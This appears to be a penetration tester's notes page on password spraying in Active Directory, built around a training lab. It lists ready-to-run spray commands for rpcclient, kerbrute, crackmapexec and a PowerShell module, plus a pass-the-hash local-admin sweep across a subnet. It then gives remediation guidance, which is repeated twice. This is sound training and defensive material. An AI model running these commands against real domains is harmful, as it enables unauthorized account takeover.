Password Spray

Start to identify valid users and check password policy

Custom Wordlist

GitHub - p0dalirius/pyLDAPWordlistHarvester: A tool to generate a wordlist from the information present in LDAP, in order to crack passwords of domain accounts.GitHub

RPCclient

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

CME

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

crackmapexec smb 172.16.5.5 -u valid_users.txt -p Welcome1 --continue-on-success

Local admin

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

SprayHound

GitHub - Hackndo/sprayhound at 5e0e5b757ab1ab8f832eddea2fad883f2773bc6eGitHub

Conpass- Continuous password spraying tool

Powershell - DomainPasswordSpray.ps1

PS C:\htb> Import-Module .\DomainPasswordSpray.ps1
PS C:\htb> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Spray

Remediation

The following security controls should be implemented to mitigate password spraying:

Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.
Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15-characters to reduce the likelihood of a successful password spraying.
Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts. Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.
Ensure passwords created for user objects are randomly generated, such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.
Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.
Scan networks at least monthly to identify any credentials that are being stored in the clear. Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.
Disable the NTLM protocol. The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

PreviousPassword Policy NextLDAP Pass Back Attack

Last updated 1 day ago

Remediation

The following security controls should be implemented to mitigate password spraying:

Create passwords for local administrator accounts, service accounts, and break glass accounts that are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Using strong passwords reduces the likelihood of successful password spraying.

Create passwords used for single-factor authentication that consist of at least four random words with a total minimum length of 15-characters to reduce the likelihood of a successful password spraying.

Lock out user objects, except for break glass accounts, after a maximum of five failed logon attempts. Enforcing an account lock threshold after five failed authentication attempts reduces the number of possible attempts in password spraying.

Ensure passwords created for user objects are randomly generated, such as when a user object is created, or a user requests a password reset. Malicious actors will try to identify reused passwords and use these in password spraying to increase the likelihood of success.

Configure the built-in ‘Administrator’ domain account as sensitive to ensure it cannot be delegated.

Scan networks at least monthly to identify any credentials that are being stored in the clear. Malicious actors scan networks for cleartext credentials to use in password spraying. Locating and removing these cleartext credentials proactively mitigates this risk.

Disable the NTLM protocol. The NTLM protocol does not support MFA and can be misused by malicious actors to bypass MFA requirements.